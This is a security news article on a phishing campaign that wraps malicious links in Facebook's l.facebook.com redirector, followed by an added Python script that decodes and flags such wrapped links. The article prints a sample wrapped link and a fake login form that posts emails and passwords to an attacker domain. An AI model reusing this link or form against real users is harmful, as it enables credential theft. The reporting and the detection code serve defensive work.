New Phishing Attack Targets Facebook Users to Steal Login Credentials

In Cybersecurity News - Original News Source is cybersecuritynews.com by Blog Writer

A sophisticated phishing campaign has recently emerged, targeting Facebook users with carefully crafted emails designed to harvest login credentials.

Attackers leverage the platform’s own external URL warning system to cloak malicious links, presenting URLs that appear legitimate while redirecting victims to counterfeit Facebook login pages.

The initial lure arrives as an urgent security notification, warning users of “unauthorized access attempts” or prompting them to verify account activity.

The email’s design closely mirrors Facebook’s styling, complete with social media icons and footer disclaimers, creating a sense of authenticity and leading recipients to click without hesitation.

Phishing (Source – X)

The campaign’s reach spans multiple languages, including English, German, Spanish, and Korean, broadening its potential victim pool.

Phishing URLs consistently follow a pattern of benign domains forwarded through Facebook’s redirector service (e.g., https://t.co/MS24b2xu6p), which then reroute to attackers’ infrastructure.

SpiderLabs analysts identified this technique after examining dozens of email samples, noting how the redirect mechanism both evades link scanners and bypasses user suspicion.

Victims who follow the link encounter a near-perfect replica of Facebook’s login interface, where credentials submitted are immediately exfiltrated to a command-and-control server.

On successful submission, the fake portal executes a brief JavaScript snippet to display an “Incorrect password” error, prompting users to re-enter their details—unwittingly supplying attackers with valid credentials on the second attempt.

The harvested data includes email addresses, phone numbers, and passwords, which are stored in a PHP backend script for later retrieval by threat actors.

Redirect-Based Infection Mechanism

The core innovation of this phishing campaign lies in its abuse of Facebook’s external URL warning system as an infection mechanism.

Rather than linking directly to malicious domains, attackers construct a URL of the form:

<a href="https://l.facebook.com/l.php?u=https%3A%2F%2Fataloraxmalicious.co%2Ffb.php&h=AT0Xyz…">
  Verify Your Account
</a>

This link leverages Facebook’s l.facebook.com redirect service, embedding the actual phishing site in the u= parameter.

When clicked, Facebook presents a warning banner but ultimately forwards the victim to the malicious page, lending credibility to the destination.

Once on the phishing site, the HTML form collects credentials via:

<form action="https://ataloraxmalicious.co/fb.php" method="POST">
  <input type="text" name="email" autocomplete="username"/>
  <input type="password" name="pass" autocomplete="current-password"/>
  <button type="submit">Log In</button>
</form>

Upon submission, a JavaScript routine triggers a second redirect back to Facebook, displaying an error notice to the user and minimizing suspicion.

This redirect-based infection mechanism not only bypasses email security gateways but also exploits user trust in Facebook’s domain, making detection and prevention significantly more challenging.
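
One way a mail gateway or triage script could handle the wrapped links described above, as an added example that is not from the original article or from SpiderLabs: it decodes the u= parameter offline and flags wrapped links whose final host falls outside an assumed list of Facebook-owned domains. The host lists, function names and sample links are assumptions constructed for illustration.

```python
import html
import re
from urllib.parse import parse_qs, urlsplit

# Assumptions (not from the article): link-shim hosts and first-party domains.
REDIRECTOR_HOSTS = {"l.facebook.com", "lm.facebook.com"}
TRUSTED_SUFFIXES = ("facebook.com", "fb.com", "messenger.com", "instagram.com")
MAX_DEPTH = 5  # bound on nested redirector wrappers
HREF_RE = re.compile(r'href\s*=\s*["\']([^"\']+)["\']', re.IGNORECASE)

# Constructed sample e-mail body: one wrapped external link, one wrapped
# first-party link, one direct first-party link.
SAMPLE = (
    '<a href="https://l.facebook.com/l.php?u=https%3A%2F%2Flogin-check.example'
    '%2Ffb.php&amp;h=AT0constructed">Verify Your Account</a>'
    '<a href="https://l.facebook.com/l.php?u=https%3A%2F%2Fwww.facebook.com%2Fhelp">Help</a>'
    '<a href="https://www.facebook.com/settings">Settings</a>'
)


def is_trusted(host):
    """True only for an exact trusted domain or a real subdomain of one."""
    host = (host or "").lower().rstrip(".")
    return any(host == s or host.endswith("." + s) for s in TRUSTED_SUFFIXES)


def unwrap(url, depth=0):
    """Decode l.php?u= wrappers without any network request."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    if host in REDIRECTOR_HOSTS and parts.path == "/l.php" and depth < MAX_DEPTH:
        target = parse_qs(parts.query).get("u", [None])[0]
        if target:
            return unwrap(target, depth + 1)
    return url


def flag_links(body):
    """Return (wrapped_link, destination) pairs that leave trusted domains."""
    findings = []
    for raw in HREF_RE.findall(body):
        link = html.unescape(raw)  # undo &amp; inside HTML attributes
        dest = unwrap(link)
        if dest != link and not is_trusted(urlsplit(dest).hostname):
            findings.append((link, dest))
    return findings
```

The check is static: it shows where the wrapper points, not where that page may redirect next, so the decoded destination should still go through the gateway's normal URL reputation checks.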
